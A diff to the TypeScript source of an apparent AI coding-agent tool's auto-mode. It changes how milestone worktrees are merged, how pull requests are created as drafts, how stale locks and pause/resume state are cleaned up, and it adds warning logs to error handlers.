+          } catch (e) {
+            // Last resort: remove the conflicted state file
+            logWarning("worktree", `checkout HEAD failed for ${f}, removing: ${(e as Error).message}`);
+            nativeRmForce(originalBasePath_, [f]);
+          }
+        }
+      }
+
+      if (nonGsdUU.length === 0) {
+        // All conflicts were .gsd/ files — safe to drop the stash
+        try {
+          execFileSync("git", ["stash", "drop"], {
+            cwd: originalBasePath_,
+            stdio: ["ignore", "pipe", "pipe"],
+            encoding: "utf-8",
+          });
+        } catch (err) { /* stash may already be consumed */
+          logWarning("worktree", `git stash drop failed: ${err instanceof Error ? err.message : String(err)}`);
+        }
+      } else {
+        // Non-.gsd conflicts remain — leave stash for manual resolution
+        logWarning("reconcile", "Stash pop conflict on non-.gsd files after merge", {
+          files: nonGsdUU.join(", "),
+        });
+      }
+    }
+  }
+
+  // 9a-iii. Restore sheltered queued milestone directories (#2505).
+  restoreShelter();
+
+  // 9b. Safety check (#1792): if nothing was committed, verify the milestone
   // work is already on the integration branch before allowing teardown.
   // Compare only non-.gsd/ paths — .gsd/ state files diverge normally and
   // are auto-resolved during the squash merge.
@@ -1187,7 +1897,7 @@ export function mergeMilestoneToMain(
     }
   }
 
-  // 8c. Detect whether any non-.gsd/ code files were actually merged (#1906).
+  // 9c. Detect whether any non-.gsd/ code files were actually merged (#1906).
   // When a milestone only produced .gsd/ metadata (summaries, roadmaps) but no
   // real code, the user sees "milestone complete" but nothing changed in their
   // codebase. Surface this so the caller can warn the user.
@@ -1202,13 +1912,14 @@ export function mergeMilestoneToMain(
       codeFilesChanged = mergedFiles.some(
         (entry) => !entry.path.startsWith(".gsd/"),
       );
-    } catch {
+    } catch (e) {
       // If HEAD~1 doesn't exist (first commit), assume code was changed
+      logWarning("worktree", `diff numstat failed (assuming code changed): ${(e as Error).message}`);
       codeFilesChanged = true;
     }
   }
 
-  // 9. Auto-push if enabled
+  // 10. Auto-push if enabled
   let pushed = false;
   if (prefs.auto_push === true && !nothingToCommit) {
     const remote = prefs.remote ?? "origin";
@@ -1219,14 +1930,15 @@ export function mergeMilestoneToMain(
         encoding: "utf-8",
       });
       pushed = true;
-    } catch {
+    } catch (err) {
       // Push failure is non-fatal
+      logWarning("worktree", `git push failed: ${err instanceof Error ? err.message : String(err)}`);
     }
   }
 
-  // 9b. Auto-create PR if enabled (requires push_branches + push succeeded)
+  // 9b. Auto-create PR if enabled (#2302: no longer gated on pushed/auto_push)
   let prCreated = false;
-  if (prefs.auto_pr === true && pushed) {
+  if (prefs.auto_pr === true && !nothingToCommit) {
     const remote = prefs.remote ?? "origin";
     const prTarget = prefs.pr_target_branch ?? mainBranch;
     try {
@@ -1236,9 +1948,9 @@ export function mergeMilestoneToMain(
         stdio: ["ignore", "pipe", "pipe"],
         encoding: "utf-8",
       });
-      // Create PR via gh CLI
+      // Create PR via gh CLI with explicit --head and --base (#2302)
       execFileSync("gh", [
-        "pr", "create",
+        "pr", "create", "--draft",
         "--base", prTarget,
         "--head", milestoneBranch,
         "--title", `Milestone ${milestoneId} complete`,
@@ -1249,16 +1961,17 @@ export function mergeMilestoneToMain(
         encoding: "utf-8",
       });
       prCreated = true;
-    } catch {
+    } catch (err) {
       // PR creation failure is non-fatal — gh may not be installed or authenticated
+      logWarning("worktree", `PR creation failed: ${err instanceof Error ? err.message : String(err)}`);
     }
   }
 
-  // 10. Guard removed — step 8b (#1792) now handles this with a smarter check:
+  // 11. Guard removed — step 9b (#1792) now handles this with a smarter check:
   //     throws only when the milestone has unanchored code changes, passes
   //     through when the code is genuinely already on the integration branch.
 
-  // 10a. Pre-teardown safety net (#1853): if the worktree still has uncommitted
+  // 11a. Pre-teardown safety net (#1853): if the worktree still has uncommitted
   // changes (e.g. nativeHasChanges cache returned stale false, or auto-commit
   // silently failed), force one final commit so code is not destroyed by
   // `git worktree remove --force`.
@@ -1282,26 +1995,29 @@ export function mergeMilestoneToMain(
     }
   }
 
-  // 11. Remove worktree directory first (must happen before branch deletion)
+  // 12. Remove worktree directory first (must happen before branch deletion)
   try {
     removeWorktree(originalBasePath_, milestoneId, {
       branch: null as unknown as string,
       deleteBranch: false,
     });
-  } catch {
+  } catch (err) {
     // Best-effort -- worktree dir may already be gone
+    logWarning("worktree", `worktree removal failed: ${err instanceof Error ? err.message : String(err)}`);
   }
 
-  // 12. Delete milestone branch (after worktree removal so ref is unlocked)
+  // 13. Delete milestone branch (after worktree removal so ref is unlocked)
   try {
     nativeBranchDelete(originalBasePath_, milestoneBranch);
-  } catch {
+  } catch (err) {
     // Best-effort
+    logWarning("worktree", `git branch-delete failed: ${err instanceof Error ? err.message : String(err)}`);
   }
 
-  // 13. Clear module state
+  // 14. Clear module state
   originalBase = null;
   nudgeGitBranchCache(previousCwd);
 
   return { commitMessage, pushed, prCreated, codeFilesChanged };
 }
+
diff --git a/src/resources/extensions/gsd/auto.ts b/src/resources/extensions/gsd/auto.ts
index eefa30400..fe21ed438 100644
--- a/src/resources/extensions/gsd/auto.ts
+++ b/src/resources/extensions/gsd/auto.ts
@@ -17,6 +17,7 @@ import type {
 } from "@gsd/pi-coding-agent";
 
 import { deriveState } from "./state.js";
+import { parseUnitId } from "./unit-id.js";
 import type { GSDState } from "./types.js";
 import {
   assessInterruptedSession,
@@ -43,6 +44,7 @@ import { clearActivityLogState } from "./activity-log.js";
 import {
   synthesizeCrashRecovery,
   getDeepDiagnostic,
+  readActiveMilestoneId,
 } from "./session-forensics.js";
 import {
   writeLock,
@@ -58,12 +60,6 @@ import {
   updateSessionLock,
 } from "./session-lock.js";
 import type { SessionLockStatus } from "./session-lock.js";
-import {
-  clearUnitRuntimeRecord,
-  inspectExecuteTaskDurability,
-  readUnitRuntimeRecord,
-  writeUnitRuntimeRecord,
-} from "./unit-runtime.js";
 import {
   resolveAutoSupervisorConfig,
   loadEffectiveGSDPreferences,
@@ -83,23 +79,14 @@ import {
   getOldestInFlightToolAgeMs as _getOldestInFlightToolAgeMs,
   getInFlightToolCount,
   getOldestInFlightToolStart,
+  hasInteractiveToolInFlight,
   clearInFlightTools,
+  isToolInvocationError,
+  isQueuedUserMessageSkip,
 } from "./auto-tool-tracking.js";
-import {
-  collectObservabilityWarnings as _collectObservabilityWarnings,
-  buildObservabilityRepairBlock,
-} from "./auto-observability.js";
 import { closeoutUnit } from "./auto-unit-closeout.js";
 import { recoverTimedOutUnit } from "./auto-timeout-recovery.js";
-import { selfHealRuntimeRecords } from "./auto-recovery.js";
 import { selectAndApplyModel, resolveModelId } from "./auto-model-selection.js";
-import {
-  syncProjectRootToWorktree,
-  syncStateToProjectRoot,
-  readResourceVersion,
-  checkResourcesStale,
-  escapeStaleWorktree,
-} from "./auto-worktree-sync.js";
 import { resetRoutingHistory, recordOutcome } from "./routing-history.js";
 import {
   checkPostUnitHooks,
@@ -127,6 +114,7 @@ import {
   captureAvailableSkills,
   resetSkillTelemetry,
 } from "./skill-telemetry.js";
+import { getRtkSessionSavings } from "../shared/rtk-session-stats.js";
 import {
   initMetrics,
   resetMetrics,
@@ -135,6 +123,7 @@ import {
   formatCost,
   formatTokenCount,
 } from "./metrics.js";
+import { setLogBasePath, logWarning, logError } from "./workflow-logger.js";
 import { join } from "node:path";
 import { readFileSync, existsSync, mkdirSync, writeFileSync, unlinkSync } from "node:fs";
 import { atomicWriteSync } from "./atomic-write.js";
@@ -160,16 +149,16 @@ import {
   mergeMilestoneToMain,
   autoWorktreeBranch,
   syncWorktreeStateBack,
+  syncProjectRootToWorktree,
+  syncStateToProjectRoot,
+  readResourceVersion,
+  checkResourcesStale,
+  escapeStaleWorktree,
 } from "./auto-worktree.js";
 import { pruneQueueOrder } from "./queue-order.js";
 
 import { debugLog, isDebugEnabled, writeDebugSummary } from "./debug-logger.js";
 import {
-  resolveExpectedArtifactPath,
-  verifyExpectedArtifact,
-  writeBlockerPlaceholder,
-  diagnoseExpectedArtifact,
-  skipExecuteTask,
   buildLoopRemediationSteps,
   reconcileMergeState,
 } from "./auto-recovery.js";
@@ -204,16 +193,17 @@ import {
   postUnitPreVerification,
   postUnitPostVerification,
 } from "./auto-post-unit.js";
-import { bootstrapAutoSession, type BootstrapDeps } from "./auto-start.js";
-import { autoLoop, resolveAgentEnd, resolveAgentEndCancelled, _resetPendingResolve, isSessionSwitchInFlight, type LoopDeps } from "./auto-loop.js";
+import { bootstrapAutoSession, openProjectDbIfPresent, type BootstrapDeps } from "./auto-start.js";
+import { autoLoop, resolveAgentEnd, resolveAgentEndCancelled, _resetPendingResolve, isSessionSwitchInFlight, type LoopDeps, type ErrorContext } from "./auto-loop.js";
+// Slice-level parallelism (#2340)
+import { getEligibleSlices } from "./slice-parallel-eligibility.js";
+import { startSliceParallel } from "./slice-parallel-orchestrator.js";
 import {
   WorktreeResolver,
   type WorktreeResolverDeps,
 } from "./worktree-resolver.js";
 import { reorderForCaching } from "./prompt-ordering.js";
 
-// Worktree sync, resource staleness, stale worktree escape → auto-worktree-sync.ts
-
 // ─── Session State ─────────────────────────────────────────────────────────
 
 import {
@@ -224,7 +214,6 @@ import {
   NEW_SESSION_TIMEOUT_MS,
 } from "./auto/session.js";
 import type {
-  CompletedUnit,
   CurrentUnit,
   UnitRouting,
   StartModel,
@@ -236,7 +225,6 @@ export {
   NEW_SESSION_TIMEOUT_MS,
 } from "./auto/session.js";
 export type {
-  CompletedUnit,
   CurrentUnit,
   UnitRouting,
   StartModel,
@@ -261,9 +249,9 @@ const STATE_REBUILD_MIN_INTERVAL_MS = 30_000;
 
 export function shouldUseWorktreeIsolation(): boolean {
   const prefs = loadEffectiveGSDPreferences()?.preferences?.git;
-  if (prefs?.isolation === "none") return false;
-  if (prefs?.isolation === "branch") return false;
-  return true; // default: worktree
+  if (prefs?.isolation === "worktree") return true;
+  // Default is false — worktree isolation requires explicit opt-in
+  return false;
 }
 
 /** Crash recovery prompt — set by startAuto, consumed by the main loop */
@@ -328,14 +316,20 @@ export { type AutoDashboardData } from "./auto-dashboard.js";
 export function getAutoDashboardData(): AutoDashboardData {
   const ledger = getLedger();
   const totals = ledger ? getProjectTotals(ledger.units) : null;
+  const sessionId = s.cmdCtx?.sessionManager?.getSessionId?.() ?? null;
+  const rtkSavings = sessionId && s.basePath
+    ? getRtkSessionSavings(s.basePath, sessionId)
+    : null;
+  const rtkEnabled = loadEffectiveGSDPreferences()?.preferences.experimental?.rtk === true;
   // Pending capture count — lazy check, non-fatal
   let pendingCaptureCount = 0;
   try {
     if (s.basePath) {
       pendingCaptureCount = countPendingCaptures(s.basePath);
     }
-  } catch {
+  } catch (err) {
     // Non-fatal — captures module may not be loaded
+    logWarning("engine", `capture count failed: ${err instanceof Error ? err.message : String(err)}`, { file: "auto.ts" });
   }
   return {
     active: s.active,
@@ -346,11 +340,12 @@ export function getAutoDashboardData(): AutoDashboardData {
       ? (s.autoStartTime > 0 ? Date.now() - s.autoStartTime : 0)
       : 0,
     currentUnit: s.currentUnit ? { ...s.currentUnit } : null,
-    completedUnits: [...s.completedUnits],
     basePath: s.basePath,
     totalCost: totals?.cost ?? 0,
     totalTokens: totals?.tokens.total ?? 0,
     pendingCaptureCount,
+    rtkSavings,
+    rtkEnabled,
   };
 }
 
@@ -393,14 +388,27 @@ export function getAutoModeStartModel(): {
 }
 
 // Tool tracking — delegates to auto-tool-tracking.ts
-export function markToolStart(toolCallId: string): void {
-  _markToolStart(toolCallId, s.active);
+export function markToolStart(toolCallId: string, toolName?: string): void {
+  _markToolStart(toolCallId, s.active, toolName);
 }
 
 export function markToolEnd(toolCallId: string): void {
   _markToolEnd(toolCallId);
 }
 
+/**
+ * Record a tool invocation error on the current session (#2883).
+ * Called from tool_execution_end when a GSD tool fails with isError.
+ * Only stores the error if it matches the tool-invocation-error pattern
+ * (malformed/truncated JSON), not normal business-logic errors.
+ */
+export function recordToolInvocationError(toolName: string, errorMsg: string): void {
+  if (!s.active) return;
+  if (isToolInvocationError(errorMsg) || isQueuedUserMessageSkip(errorMsg)) {
+    s.lastToolInvocationError = `${toolName}: ${errorMsg}`;
+  }
+}
+
 export function getOldestInFlightToolAgeMs(): number {
   return _getOldestInFlightToolAgeMs();
 }
@@ -431,6 +439,13 @@ export function stopAutoRemote(projectRoot: string): {
   const lock = readCrashLock(projectRoot);
   if (!lock) return { found: false };
 
+  // Never SIGTERM ourselves — a stale lock with our own PID is not a remote
+  // session, it is leftover from a prior loop exit in this process. (#2730)
+  if (lock.pid === process.pid) {
+    clearLock(projectRoot);
+    return { found: false };
+  }
+
   if (!isLockProcessAlive(lock)) {
     // Stale lock — clean it up
     clearLock(projectRoot);
@@ -458,11 +473,14 @@ export function checkRemoteAutoSession(projectRoot: string): {
   unitType?: string;
   unitId?: string;
   startedAt?: string;
-  completedUnits?: number;
 } {
   const lock = readCrashLock(projectRoot);
   if (!lock) return { running: false };
 
+  // Our own PID is not a "remote" session — it is a stale lock left by this
+  // process (e.g. after step-mode exit without full cleanup). (#2730)
+  if (lock.pid === process.pid) return { running: false };
+
   if (!isLockProcessAlive(lock)) {
     // Stale lock from a dead process — not a live remote session
     return { running: false };
@@ -474,7 +492,6 @@ export function checkRemoteAutoSession(projectRoot: string): {
     unitType: lock.unitType,
     unitId: lock.unitId,
     startedAt: lock.startedAt,
-    completedUnits: lock.completedUnits,
   };
 }
 
@@ -502,23 +519,19 @@ function clearUnitTimeout(): void {
   clearInFlightTools();
 }
 
-/** Build snapshot metric opts, enriching with continueHereFired from the runtime record. */
+/** Build snapshot metric opts. */
 function buildSnapshotOpts(
-  unitType: string,
-  unitId: string,
+  _unitType: string,
+  _unitId: string,
 ): {
   continueHereFired?: boolean;
   promptCharCount?: number;
   baselineCharCount?: number;
 } & Record<string, unknown> {
-  const runtime = s.currentUnit
-    ? readUnitRuntimeRecord(s.basePath, unitType, unitId)
-    : null;
   return {
     promptCharCount: s.lastPromptCharCount,
     baselineCharCount: s.lastBaselineCharCount,
     ...(s.currentUnitRouting ?? {}),
-    ...(runtime?.continueHereFired ? { continueHereFired: true } : {}),
   };
 }
 
@@ -571,6 +584,17 @@ function cleanupAfterLoopExit(ctx: ExtensionContext): void {
   s.active = false;
   clearUnitTimeout();
 
+  // Clear crash lock and release session lock so the next `/gsd next` does
+  // not see a stale lock with the current PID and treat it as a "remote"
+  // session (which would cause it to SIGTERM itself). (#2730)
+  try {
+    if (lockBase()) clearLock(lockBase());
+    if (lockBase()) releaseSessionLock(lockBase());
+  } catch (err) {
+    /* best-effort — mirror stopAuto cleanup */
+    logWarning("session", `lock cleanup failed: ${err instanceof Error ? err.message : String(err)}`, { file: "auto.ts" });
+  }
+
   ctx.ui.setStatus("gsd-auto", undefined);
   ctx.ui.setWidget("gsd-progress", undefined);
   ctx.ui.setFooter(undefined);
@@ -580,8 +604,9 @@ function cleanupAfterLoopExit(ctx: ExtensionContext): void {
     s.basePath = s.originalBasePath;
     try {
       process.chdir(s.basePath);
-    } catch {
+    } catch (err) {
       /* best-effort */
+      logWarning("engine", `chdir failed: ${err instanceof Error ? err.message : String(err)}`, { file: "auto.ts" });
     }
   }
 }
@@ -605,6 +630,18 @@ export async function stopAuto(
       debugLog("stop-cleanup-locks", { error: e instanceof Error ? e.message : String(e) });
     }
 
+    // ── Step 1b: Flush queued follow-up messages (#3512) ──
+    // Late async notifications (async_job_result, gsd-auto-wrapup) can trigger
+    // extra LLM turns after stop. Flush them the same way run-unit.ts does.
+    try {
+      const cmdCtxAny = s.cmdCtx as Record<string, unknown> | null;
+      if (typeof cmdCtxAny?.clearQueue === "function") {
+        (cmdCtxAny.clearQueue as () => unknown)();
+      }
+    } catch (e) {
+      debugLog("stop-cleanup-queue", { error: e instanceof Error ? e.message : String(e) });
+    }
+
     // ── Step 2: Skill state ──
     try {
       clearSkillSnapshot();
@@ -621,14 +658,52 @@ export async function stopAuto(
     }
 
     // ── Step 4: Auto-worktree exit ──
+    // When the milestone is complete (has a SUMMARY), merge the worktree branch
+    // back to main so code isn't stranded on the worktree branch (#2317).
+    // For incomplete milestones, preserve the branch for later resumption.
+    //
+    // Skip if phases.ts already merged this milestone — avoids the double
+    // mergeAndExit that fails because the branch was already deleted (#2645).
     try {
-      if (s.currentMilestoneId) {
+      if (s.currentMilestoneId && !s.milestoneMergedInPhases) {
         const notifyCtx = ctx
           ? { notify: ctx.ui.notify.bind(ctx.ui) }
           : { notify: () => {} };
-        buildResolver().exitMilestone(s.currentMilestoneId, notifyCtx, {
-          preserveBranch: true,
-        });
+        const resolver = buildResolver();
+
+        // Check if the milestone is complete — SUMMARY file is the authoritative signal.
+        let milestoneComplete = false;
+        try {
+          const summaryPath = resolveMilestoneFile(
+            s.originalBasePath || s.basePath,
+            s.currentMilestoneId,
+            "SUMMARY",
+          );
+          if (!summaryPath) {
+            // Also check in the worktree path (SUMMARY may not be synced yet)
+            const wtSummaryPath = resolveMilestoneFile(
+              s.basePath,
+              s.currentMilestoneId,
+              "SUMMARY",
+            );
+            milestoneComplete = wtSummaryPath !== null;
+          } else {
+            milestoneComplete = true;
+          }
+        } catch (err) {
+          // Non-fatal — fall through to preserveBranch path
+          logWarning("engine", `milestone summary check failed: ${err instanceof Error ? err.message : String(err)}`, { file: "auto.ts" });
+        }
+
+        if (milestoneComplete) {
+          // Milestone is complete — merge worktree branch back to main
+          resolver.mergeAndExit(s.currentMilestoneId, notifyCtx);
+        } else {
+          // Milestone still in progress — preserve branch for later resumption
+          resolver.exitMilestone(s.currentMilestoneId, notifyCtx, {
+            preserveBranch: true,
+          });
+        }
       }
     } catch (e) {
       debugLog("stop-cleanup-worktree", { error: e instanceof Error ? e.message : String(e) });
@@ -652,8 +727,9 @@ export async function stopAuto(
         s.basePath = s.originalBasePath;
         try {
           process.chdir(s.basePath);
-        } catch {
+        } catch (err) {
           /* best-effort */
+          logWarning("engine", `chdir failed: ${err instanceof Error ? err.message : String(err)}`, { file: "auto.ts" });
         }
       }
     } catch (e) {
@@ -725,7 +801,9 @@ export async function stopAuto(
     try {
       const pausedPath = join(gsdRoot(s.originalBasePath || s.basePath), "runtime", "paused-session.json");
       if (existsSync(pausedPath)) unlinkSync(pausedPath);
-    } catch { /* non-fatal */ }
+    } catch (err) { /* non-fatal */
+      logWarning("engine", `file unlink failed: ${err instanceof Error ? err.message : String(err)}`, { file: "auto.ts" });
+    }
 
     // ── Step 13: Restore original model (before reset clears IDs) ──
     try {
@@ -759,7 +837,9 @@ export async function stopAuto(
         const { closeBrowser } = await import("../browser-tools/lifecycle.js");
         await closeBrowser();
       }
-    } catch { /* non-fatal: browser-tools may not be loaded */ }
+    } catch (err) { /* non-fatal: browser-tools may not be loaded */
+      logWarning("engine", `browser teardown failed: ${err instanceof Error ? err.message : String(err)}`, { file: "auto.ts" });
+    }
 
     // External cleanup (not covered by session reset)
     clearInFlightTools();
@@ -786,11 +866,27 @@ export async function stopAuto(
 export async function pauseAuto(
   ctx?: ExtensionContext,
   _pi?: ExtensionAPI,
+  _errorContext?: ErrorContext,
 ): Promise<void> {
   if (!s.active) return;
   clearUnitTimeout();
+
+  // Flush queued follow-up messages (#3512).
+  // Late async notifications (async_job_result, gsd-auto-wrapup) can trigger
+  // extra LLM turns after pause. Flush them the same way run-unit.ts does.
+  try {
+    const cmdCtxAny = s.cmdCtx as Record<string, unknown> | null;
+    if (typeof cmdCtxAny?.clearQueue === "function") {
+      (cmdCtxAny.clearQueue as () => unknown)();
+    }
+  } catch (e) {
+    debugLog("pause-cleanup-queue", { error: e instanceof Error ? e.message : String(e) });
+  }
+
   // Unblock any pending unit promise so the auto-loop is not orphaned.
-  resolveAgentEndCancelled();
+  // Pass errorContext so runUnitPhase can distinguish user-initiated pause
+  // from provider-error pause and avoid hard-stopping (#2762).
+  resolveAgentEndCancelled(_errorContext);
 
   s.pausedSessionFile = ctx?.sessionManager?.getSessionFile() ?? null;
 
@@ -808,6 +904,7 @@ export async function pauseAuto(
       unitId: s.currentUnit?.id ?? undefined,
       activeEngineId: s.activeEngineId,
       activeRunDir: s.activeRunDir,
+      autoStartTime: s.autoStartTime,
     };
     const runtimeDir = join(gsdRoot(s.originalBasePath || s.basePath), "runtime");
     mkdirSync(runtimeDir, { recursive: true });
@@ -816,21 +913,18 @@ export async function pauseAuto(
       JSON.stringify(pausedMeta, null, 2),
       "utf-8",
     );
-  } catch {
+  } catch (err) {
     // Non-fatal — resume will still work via full bootstrap, just without worktree context
+    logWarning("engine", `paused-session file write failed: ${err instanceof Error ? err.message : String(err)}`, { file: "auto.ts" });
   }
 
   // Close out the current unit so its runtime record doesn't stay at "dispatched"
   if (s.currentUnit && ctx) {
     try {
       await closeoutUnit(ctx, s.basePath, s.currentUnit.type, s.currentUnit.id, s.currentUnit.startedAt);
-    } catch {
+    } catch (err) {
       // Non-fatal — best-effort closeout on pause
-    }
-    try {
-      clearUnitRuntimeRecord(s.basePath, s.currentUnit.type, s.currentUnit.id);
-    } catch {
-      // Non-fatal
+      logWarning("engine", `unit closeout on pause failed: ${err instanceof Error ? err.message : String(err)}`, { file: "auto.ts" });
     }
     s.currentUnit = null;
   }
@@ -970,14 +1064,8 @@ function buildLoopDeps(): LoopDeps {
     runPreDispatchHooks,
     getPriorSliceCompletionBlocker,
     getMainBranch,
-    collectObservabilityWarnings: _collectObservabilityWarnings,
-    buildObservabilityRepairBlock,
-
     // Unit closeout + runtime records
     closeoutUnit,
-    verifyExpectedArtifact,
-    clearUnitRuntimeRecord,
-    writeUnitRuntimeRecord,
     recordOutcome,
     writeLock,
     captureAvailableSkills,
@@ -990,7 +1078,11 @@ function buildLoopDeps(): LoopDeps {
     startUnitSupervision,
 
     // Prompt helpers
-    getDeepDiagnostic,
+    getDeepDiagnostic: (basePath: string) => {
+      const mid = readActiveMilestoneId(basePath);
+      const wtPath = mid ? getAutoWorktreePath(basePath, mid) : undefined;
+      return getDeepDiagnostic(basePath, wtPath ?? undefined);
+    },
     isDbAvailable,
     reorderForCaching,
 
@@ -1035,6 +1127,11 @@ export async function startAuto(
     interrupted?: InterruptedSessionAssessment;
   },
 ): Promise<void> {
+  if (s.active) {
+    debugLog("startAuto", { phase: "already-active", skipping: true });
+    return;
+  }
+
   const requestedStepMode = options?.step ?? false;
   const interruptedAssessment = options?.interrupted ?? null;
 
@@ -1086,8 +1183,9 @@ export async function startAuto(
           const mDir = resolveMilestonePath(base, meta.milestoneId);
           const summaryFile = resolveMilestoneFile(base, meta.milestoneId, "SUMMARY");
           if (!mDir || summaryFile) {
-            // Stale milestone — clean up and fall through to fresh bootstrap
-            try { unlinkSync(pausedPath); } catch { /* non-fatal */ }
+            try { unlinkSync(pausedPath); } catch (err) {
+              logWarning("session", `pause file cleanup failed: ${err instanceof Error ? err.message : String(err)}`, { file: "auto.ts" });
+            }
             ctx.ui.notify(
               `Paused milestone ${meta.milestoneId} is ${!mDir ? "missing" : "already complete"}. Starting fresh.`,
               "info",
@@ -1110,8 +1208,9 @@ export async function startAuto(
           try { unlinkSync(pausedPath); } catch { /* non-fatal */ }
         }
       }
-    } catch {
+    } catch (err) {
       // Malformed or missing — proceed with fresh bootstrap
+      logWarning("session", `paused-session restore failed: ${err instanceof Error ? err.message : String(err)}`, { file: "auto.ts" });
     }
   }
 
@@ -1145,23 +1244,27 @@ export async function startAuto(
   if (s.paused) {
     const resumeLock = acquireSessionLock(base);
     if (!resumeLock.acquired) {
+      // Reset paused state so isAutoPaused() doesn't stick true after lock failure.
+      // Pause file is preserved on disk for retry — not deleted.
+      s.paused = false;
       ctx.ui.notify(`Cannot resume: ${resumeLock.reason}`, "error");
       return;
     }
 
+    // Lock acquired — now safe to delete the pause file
+    if (s.pausedSessionFile) {
+      try { unlinkSync(s.pausedSessionFile); } catch (err) {
+        logWarning("session", `pause file cleanup failed: ${err instanceof Error ? err.message : String(err)}`, { file: "auto.ts" });
+      }
+      s.pausedSessionFile = null;
+    }
+
     s.paused = false;
     s.active = true;
     s.verbose = verboseMode;
-    s.stepMode = s.stepMode || requestedStepMode;
+    s.stepMode = requestedStepMode;
     s.cmdCtx = ctx;
     s.basePath = base;
-    s.autoStartTime = Date.now();
-    s.resourceVersionOnStart = readResourceVersion();
-    s.originalModelId = ctx.model?.id ?? null;
-    s.originalModelProvider = ctx.model?.provider ?? null;
-    if (ctx.model) {
-      s.autoModeStartModel = { provider: ctx.model.provider, id: ctx.model.id };
-    }
     s.unitDispatchCount.clear();
     s.unitLifetimeDispatches.clear();
     if (!getLedger()) initMetrics(base);
@@ -1196,6 +1299,9 @@ export async function startAuto(
       "info",
     );
     restoreHookState(s.basePath);
+    // Open the project DB before rebuild/derive so resume uses DB-backed
+    // state instead of falling back to stale markdown parsing (#2940).
+    await openProjectDbIfPresent(s.basePath);
     try {
       await rebuildState(s.basePath);
       syncCmuxSidebar(loadEffectiveGSDPreferences()?.preferences, await deriveState(s.basePath));
@@ -1219,15 +1325,6 @@ export async function startAuto(
     }
     invalidateAllCaches();
 
-    // Clean stale runtime records left from the paused session
-    try {
-      await selfHealRuntimeRecords(s.basePath, ctx);
-    } catch (e) {
-      debugLog("resume-self-heal-runtime-failed", {
-        error: e instanceof Error ? e.message : String(e),
-      });
-    }
-
     if (s.pausedSessionFile) {
       const activityDir = join(gsdRoot(s.basePath), "activity");
       const recovery = synthesizeCrashRecovery(
@@ -1251,19 +1348,14 @@ export async function startAuto(
       lockBase(),
       "resuming",
       s.currentMilestoneId ?? "unknown",
-      s.completedUnits.length,
     );
     writeLock(
       lockBase(),
       "resuming",
       s.currentMilestoneId ?? "unknown",
-      s.completedUnits.length,
     );
     logCmuxEvent(loadEffectiveGSDPreferences()?.preferences, s.stepMode ? "Step-mode resumed." : "Auto-mode resumed.", "progress");
 
-    // Clear orphaned runtime records from prior process deaths before entering the loop
-    await selfHealRuntimeRecords(s.basePath, ctx);
-
     await autoLoop(ctx, pi, s, buildLoopDeps());
     cleanupAfterLoopExit(ctx);
     return;
@@ -1291,14 +1383,12 @@ export async function startAuto(
 
   try {
     syncCmuxSidebar(loadEffectiveGSDPreferences()?.preferences, await deriveState(s.basePath));
-  } catch {
+  } catch (err) {
     // Best-effort only — sidebar sync must never block auto-mode startup
+    logWarning("engine", `cmux sync failed: ${err instanceof Error ? err.message : String(err)}`, { file: "auto.ts" });
   }
   logCmuxEvent(loadEffectiveGSDPreferences()?.preferences, requestedStepMode ? "Step-mode started." : "Auto-mode started.", "progress");
 
-  // Clear orphaned runtime records from prior process deaths before entering the loop
-  await selfHealRuntimeRecords(s.basePath, ctx);
-
   // Dispatch the first unit
   await autoLoop(ctx, pi, s, buildLoopDeps());
   cleanupAfterLoopExit(ctx);
@@ -1359,6 +1449,7 @@ const widgetStateAccessors: WidgetStateAccessors = {
   getBasePath: () => s.basePath,
   isVerbose: () => s.verbose,
   isSessionSwitching: isSessionSwitchInFlight,
+  getCurrentDispatchedModelId: () => s.currentDispatchedModelId,
 };
 
 // ─── Preconditions ────────────────────────────────────────────────────────────
@@ -1373,8 +1464,7 @@ function ensurePreconditions(
   base: string,
   state: GSDState,
 ): void {
-  const parts = unitId.split("/");
-  const mid = parts[0]!;
+  const { milestone: mid, slice: sid } = parseUnitId(unitId);
 
   const mDir = resolveMilestonePath(base, mid);
   if (!mDir) {
@@ -1382,8 +1472,7 @@ function ensurePreconditions(
     mkdirSync(join(newDir, "slices"), { recursive: true });
   }
 
-  if (parts.length >= 2) {
-    const sid = parts[1]!;
+  if (sid !== undefined) {
 
     const mDirResolved = resolveMilestonePath(base, mid);
     if (mDirResolved) {
@@ -1418,7 +1507,6 @@ export async function dispatchHookUnit(
     s.basePath = targetBasePath;
     s.autoStartTime = Date.now();
     s.currentUnit = null;
-    s.completedUnits = [];
     s.pendingQuickTasks = [];
   }
 
@@ -1443,29 +1531,15 @@ export async function dispatchHookUnit(
     startedAt: hookStartedAt,
   };
 
-  writeUnitRuntimeRecord(
-    s.basePath,
-    hookUnitType,
-    triggerUnitId,
-    hookStartedAt,
-    {
-      phase: "dispatched",
-      wrapupWarningSent: false,
-      timeoutAt: null,
-      lastProgressAt: hookStartedAt,
-      progressCount: 0,
-      lastProgressKind: "dispatch",
-    },
-  );
-
   if (hookModel) {
     const availableModels = ctx.modelRegistry.getAvailable();
     const match = resolveModelId(hookModel, availableModels, ctx.model?.provider);
     if (match) {
       try {
         await pi.setModel(match);
-      } catch {
+      } catch (err) {
         /* non-fatal */
+        logWarning("dispatch", `hook model set failed: ${err instanceof Error ? err.message : String(err)}`, { file: "auto.ts" });
       }
     } else {
       ctx.ui.notify(
@@ -1481,7 +1555,6 @@ export async function dispatchHookUnit(
     lockBase(),
     hookUnitType,
     triggerUnitId,
-    s.completedUnits.length,
     sessionFile,
   );
 
@@ -1491,18 +1564,6 @@ export async function dispatchHookUnit(
   s.unitTimeoutHandle = setTimeout(async () => {
     s.unitTimeoutHandle = null;
     if (!s.active) return;
-    if (s.currentUnit) {
-      writeUnitRuntimeRecord(
-        s.basePath,
-        hookUnitType,
-        triggerUnitId,
-        hookStartedAt,
-        {
-          phase: "timeout",
-          timeoutAt: Date.now(),
-        },
-      );
-    }
     ctx.ui.notify(
       `Hook ${hookName} exceeded ${supervisor.hard_timeout_minutes ?? 30}min timeout. Pausing auto-mode.`,
       "warning",
@@ -1515,7 +1576,9 @@ export async function dispatchHookUnit(
   ctx.ui.notify(`Running post-unit hook: ${hookName}`, "info");
 
   // Ensure cwd matches basePath before hook dispatch (#1389)
-  try { if (process.cwd() !== s.basePath) process.chdir(s.basePath); } catch {}
+  try { if (process.cwd() !== s.basePath) process.chdir(s.basePath); } catch (err) {
+    logWarning("engine", `chdir failed before hook dispatch: ${err instanceof Error ? err.message : String(err)}`, { file: "auto.ts" });
+  }
 
   debugLog("dispatchHookUnit", {
     phase: "send-message",
